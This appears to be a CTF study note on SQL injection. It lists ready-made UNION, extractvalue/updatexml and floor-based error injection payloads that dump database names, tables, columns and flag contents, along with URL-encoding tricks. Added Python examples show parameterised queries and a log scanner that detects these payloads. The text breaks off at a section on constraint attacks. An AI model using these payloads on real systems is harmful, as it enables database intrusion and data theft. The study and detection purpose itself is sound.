SQL Injection
Neither of the two SQL challenges in hgame was particularly hard: there was validation but no filtering. It brought back the dread of being at the mercy of time-based blind injection during recruitment~ Here is a rough outline of the overall framework.
Numeric type and string type
By the type of the data being queried, injections fall into numeric type and string type.
How to tell them apart:
`?id=1 and 1=1` returns a normal result → numeric type
`?id=1'and'1'='2` returns a normal result → string type
Injection with visible output: UNION query
Query statements
- Table names
  ```sql
  select table_name from information_schema.tables where table_schema=database() limit 0,1
  ```
- Column names
  ```sql
  select column_name from information_schema.columns where table_name='<table_name>' limit 0,1
  ```
- Contents (FROM takes the table name found above)
  ```sql
  SELECT concat(username,0x3a,0x7e) FROM <table_name> limit 3,1
  ```
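As an added example (not from the original notes), here are the two sink types from the classification rule above next to the parameterised form that removes the distinction, in Python over an in-memory sqlite3 table standing in for a MySQL target. The table layout, the function names and the `classify_sink` helper are assumptions; the probes are the ones quoted above.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for a challenge's user table (assumption: the
    # real target is MySQL; sqlite3 is used here only because it ships with Python).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    return con


def lookup_numeric_vulnerable(con, user_id):
    # Numeric-type sink: the parameter is pasted into the statement without quotes,
    # so a probe like "1 and 1=1" is parsed as part of the WHERE clause.
    sql = f"SELECT username FROM users WHERE id={user_id}"
    return [row[0] for row in con.execute(sql)]


def lookup_string_vulnerable(con, user_id):
    # String-type sink: the parameter sits inside single quotes, so a probe has to
    # close the quote first ("1' and '1'='1") before it can alter the query.
    sql = f"SELECT username FROM users WHERE id='{user_id}'"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, user_id):
    # Parameterised query: the driver sends the value separately from the statement
    # text, so whatever the client submits is compared literally against the id
    # column and never becomes SQL syntax (the same holds for UNION payloads).
    sql = "SELECT username FROM users WHERE id=?"
    return [row[0] for row in con.execute(sql, (user_id,))]


def classify_sink(con, lookup):
    # Regression check built on the rule from the notes: run both probes against a
    # data-access function and report which kind of sink it behaves like.
    # A syntax error counts as "no normal result" for that probe.
    try:
        numeric_hit = lookup(con, "1 and 1=1") != []
    except sqlite3.Error:
        numeric_hit = False
    try:
        string_hit = lookup(con, "1' and '1'='1") != []
    except sqlite3.Error:
        string_hit = False
    if numeric_hit:
        return "numeric"
    if string_hit:
        return "string"
    return "none"


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_numeric_vulnerable, lookup_string_vulnerable, lookup_safe):
        print(f"{fn.__name__}: {classify_sink(db, fn)}")
```

`classify_sink` can be run in a test suite against real data-access functions: any answer other than `none` means a parameter is being concatenated into the statement text, and the fix is the `lookup_safe` form, where a bound value is only ever data and cannot append a second SELECT.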
Blind injection:
- Boolean-based blind injection
- Time-based blind injection
- Error-based blind injection
extractvalue/updatexml injection
```sql
'&& extractvalue(1,concat(0x7e,(select database()),0x7e))#
```
The same payload URL-encoded (`'` as `%27`, `&&` as `%26%26`, a `%0a` newline in place of the space, `#` as `%23`):
```
%27%26%26%0aextractvalue(1,concat(0x7e,(select database()),0x7e))%23
```
```sql
1'%26%26 1=extractvalue(1,database())%23
```
Double-query formula
```sql
select count(*),concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;
```
floor error-based injection
- Dump the database name
  ```sql
  1'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+&code=uoEJ
  ```
- Dump table names
  ```sql
  1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
  ```
- Dump column names
  ```sql
  1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='fl444g' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
  ```
- Dump field contents
  ```sql
  1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,fl444g_is_here,0x3a,0x23) FROM fl444g limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
  ```
Notes
Encoding issues
Mind the spaces: the `select` above is written as `&&%0aselect`, with the `%0a` newline standing in for the space.
`limit 0,1`
Start at row 0 and take one row.
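Added example, not part of the original notes: a small log scanner that turns the encoding points above into detection logic. It decodes `%26%26%0a`-style spacing before matching the extractvalue/updatexml, floor(rand(0)*2) and information_schema patterns from the sections above, so a payload cannot slip past by swapping a space for a newline. The log lines are constructed, the log format is a simplified Apache combined format, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (simplified combined format). The payloads are the
# ones quoted in the notes, URL-encoded as they would appear on the wire; the
# hosts, timestamps and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2021:10:01:02 +0800] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Feb/2021:10:01:09 +0800] "GET /index.php?id=1%27%26%26%0aextractvalue(1,concat(0x7e,(select%20database()),0x7e))%23 HTTP/1.1" 500 233
10.0.0.9 - - [12/Feb/2021:10:03:00 +0800] "GET /index.php?id=1%27and(select%201%20from(select%20count(*),concat((select%20database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+ HTTP/1.1" 500 240
10.0.0.2 - - [12/Feb/2021:10:04:30 +0800] "GET /about.php?page=extract HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the techniques covered in the notes, matched against a decoded,
# whitespace-folded, lower-cased parameter value.
SIGNATURES = {
    "error-based (extractvalue/updatexml)": re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "error-based (floor/rand/group by)": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by"),
    "schema enumeration": re.compile(r"information_schema\s*\.\s*(tables|columns)"),
    "union query": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
}


def normalize(value):
    # parse_qsl already removed one layer of URL encoding; decode once more to
    # unwind double encoding, then fold %0a/%09 newline-and-tab spacing and inline
    # comments into single spaces so "&&%0aselect" looks the same as "&& select".
    decoded = unquote_plus(value).replace("/**/", " ")
    return re.sub(r"\s+", " ", decoded).lower()


def scan_request(line):
    # Parse one log line and match every query parameter against the signatures.
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        norm = normalize(value)
        for label, pattern in SIGNATURES.items():
            if pattern.search(norm):
                hits.append((name, label))
    return {"ip": m.group("ip"), "path": parts.path, "status": m.group("status"), "hits": hits}


def scan_log(text):
    # Return only the requests that matched at least one signature.
    flagged = []
    for line in text.splitlines():
        result = scan_request(line) if line.strip() else None
        if result and result["hits"]:
            flagged.append(result)
    return flagged


if __name__ == "__main__":
    for entry in scan_log(SAMPLE_LOG):
        print(entry["ip"], entry["path"], entry["status"], entry["hits"])
```

The status code is carried through on purpose: an error-based payload that actually reaches the database tends to pair with a 500, so a signature hit on a 500 response is a stronger signal than the same string on a 200, and the generic fix on the application side is to stop returning database error text to the client at all.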
SQL constraint attack
BugKu login1
The challenge hint said it was a constraint-based SQL attack; after a quick search,